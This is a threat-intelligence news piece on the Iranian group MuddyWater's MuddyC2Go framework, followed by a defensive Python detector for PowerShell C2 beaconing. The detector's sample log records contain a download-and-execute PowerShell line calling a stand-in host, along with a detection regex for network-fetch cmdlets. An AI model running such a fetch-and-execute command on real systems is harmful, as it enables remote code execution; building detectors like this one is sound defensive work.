Iranian nation-state actors have been observed using a previously undocumented command-and-control (C2) framework called MuddyC2Go as part of attacks targeting Israel.
“The framework’s web component is written in the Go programming language,” Deep Instinct security researcher Simon Kenin said in a technical report published Wednesday.
The tool has been attributed to MuddyWater, an Iranian state-sponsored hacking crew that is affiliated with the country’s Ministry of Intelligence and Security (MOIS).
The cybersecurity firm said the C2 framework may have been in use by the threat actor since early 2020, with recent attacks leveraging it in place of PhonyC2, another custom C2 platform from MuddyWater that came to light in June 2023 and has had its source code leaked.
Typical attack sequences observed over time have involved sending spear-phishing emails bearing malware-laced archives or bogus links that lead to the deployment of legitimate remote administration tools.
The installation of the remote administration software paves the way for the delivery of additional payloads, including PhonyC2.
MuddyWater’s modus operandi has since received a facelift, using password-protected archives to evade email security solutions and distributing an executable instead of a remote administration tool.
“This executable contains an embedded PowerShell script that automatically connects to MuddyWater’s C2, eliminating the need for manual execution by the operator,” Kenin explained.
The MuddyC2Go server, in return, sends a PowerShell script, which runs every 10 seconds and waits for further commands from the operator.
While the full extent of MuddyC2Go’s features is unknown, it is suspected to be a framework that is responsible for generating PowerShell payloads in order to conduct post-exploitation actions.
“We recommend disabling PowerShell if it is not needed,” Kenin said. “If it is enabled, we recommend close monitoring of PowerShell activity.”
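As an added defensive illustration (not code from the report or from Deep Instinct), the script below applies that monitoring advice to constructed PowerShell script block log records and flags a process whose network-fetching script blocks recur on a steady cadence of about 10 seconds, matching the polling loop described above; the process ids, timestamps and URLs are invented, and the 10-second expected interval and jitter threshold are tunable assumptions.

```python
import re
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample of PowerShell script block log records (Windows Event ID 4104),
# reduced to (timestamp, process id, script text). Process 4242 mimics the reported
# behaviour: a script polling a C2 endpoint every ~10 seconds. 9001 and 5150 are benign controls.
SAMPLE_EVENTS = [
    ("2023-11-08T09:00:00", 4242, "$r=(New-Object Net.WebClient).DownloadString('http://c2.invalid/t');iex $r"),
    ("2023-11-08T09:00:10", 4242, "$r=(New-Object Net.WebClient).DownloadString('http://c2.invalid/t');iex $r"),
    ("2023-11-08T09:00:19", 4242, "$r=(New-Object Net.WebClient).DownloadString('http://c2.invalid/t');iex $r"),
    ("2023-11-08T09:00:30", 4242, "$r=(New-Object Net.WebClient).DownloadString('http://c2.invalid/t');iex $r"),
    ("2023-11-08T09:00:40", 4242, "$r=(New-Object Net.WebClient).DownloadString('http://c2.invalid/t');iex $r"),
    ("2023-11-08T09:00:05", 9001, "Get-Service | Where-Object Status -eq 'Running'"),
    ("2023-11-08T09:00:15", 9001, "Get-Service | Where-Object Status -eq 'Running'"),
    ("2023-11-08T09:00:02", 5150, "Invoke-WebRequest -Uri 'https://updates.example/pkg.zip' -OutFile pkg.zip"),
]

# Cmdlets and .NET types commonly used to fetch remote content from PowerShell.
NETWORK_PATTERN = re.compile(
    r"Net\.WebClient|DownloadString|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b",
    re.IGNORECASE,
)


def find_beaconing(events, expected_interval=10.0, min_hits=4, max_jitter=2.0):
    """Return {pid: mean_gap_seconds} for processes whose network-capable script
    blocks recur at a steady cadence close to expected_interval."""
    times_by_pid = {}
    for ts, pid, script in events:
        if NETWORK_PATTERN.search(script):
            times_by_pid.setdefault(pid, []).append(datetime.fromisoformat(ts))
    flagged = {}
    for pid, times in times_by_pid.items():
        if len(times) < max(min_hits, 2):  # a one-off download is not a beacon
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Flag when the average gap sits near the expected cadence and jitter is low.
        if abs(mean(gaps) - expected_interval) <= max_jitter and pstdev(gaps) <= max_jitter:
            flagged[pid] = round(mean(gaps), 1)
    return flagged


if __name__ == "__main__":
    for pid, gap in find_beaconing(SAMPLE_EVENTS).items():
        print(f"PID {pid}: network script block every {gap}s, review for C2 polling")
```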